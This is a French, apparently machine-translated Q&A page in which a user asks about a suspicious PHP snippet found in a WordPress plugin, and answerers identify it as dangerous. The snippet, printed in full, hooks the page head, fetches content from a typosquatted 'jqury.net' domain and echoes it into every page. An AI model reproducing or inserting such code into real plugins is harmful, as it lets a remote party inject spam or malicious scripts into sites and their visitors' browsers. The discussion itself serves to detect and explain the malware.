web-dev-qa-db-fra.com

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_Host']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
pluginswp-adminsecuritycurl
17
Sofia Rose

Il charge un bloc de balisage contenant du spam (j'ai pensé poster un peu de la source mais je ne veux en aucun cas publier le contenu) à partir d'un domaine qui est une faute d'orthographe proche du domaine - http://jquery.com/-- utilisé par jQuery, une bibliothèque Javascript réputée et populaire, que WordPress inclut dans le Core. Je pense que l’idée est apparemment de charger cette bibliothèque, alors qu’il charge quelque chose de très différent.

Et c'est d'une autre manière que vous essayez de charger jQuery. Notez le nom de la variable $jquery.

Il peut également tenter de charger des scripts malveillants. Je n'ai pas vérifié. I would appelle certainement cela dangereux, d'autant plus que le contenu de cette page peut changer à tout moment si les contrôleurs de domaine en ont envie.

Au mieux, cela endommagera votre site si les moteurs de recherche regardent de haut en bas les sites qui diffusent du spam.

Ne l'utilisez pas. Cela ne présente aucun avantage pour vous ou pour quiconque sur le Web, à l'exception des personnes qui gèrent le site. Si vous avez trouvé cela sur un site réputé, signalez-le-leur.

16
s_ha_dum

Oui, c'est du code dangereux, charger du contenu depuis un site spam.

Vous n'avez pas nommé le plug-in, mais si vous avez trouvé ce code après l'avoir installé sur votre site Web, il est possible que le code du plug-in ne provienne pas du développeur, mais qu'il a été piraté après son installation. Si tel est le cas, vous pourriez trouver le code malveillant sur plus de votre site Web que juste ce plugin.

Vérifiez le code du plug-in téléchargé à partir de l'endroit où vous l'avez obtenu à l'origine et voyez si ce code malveillant s'y trouvait à l'origine. Sinon, votre site a été piraté. Si vous estimez que tel est le cas, lisez cet article du Codex .

7
Ben Miller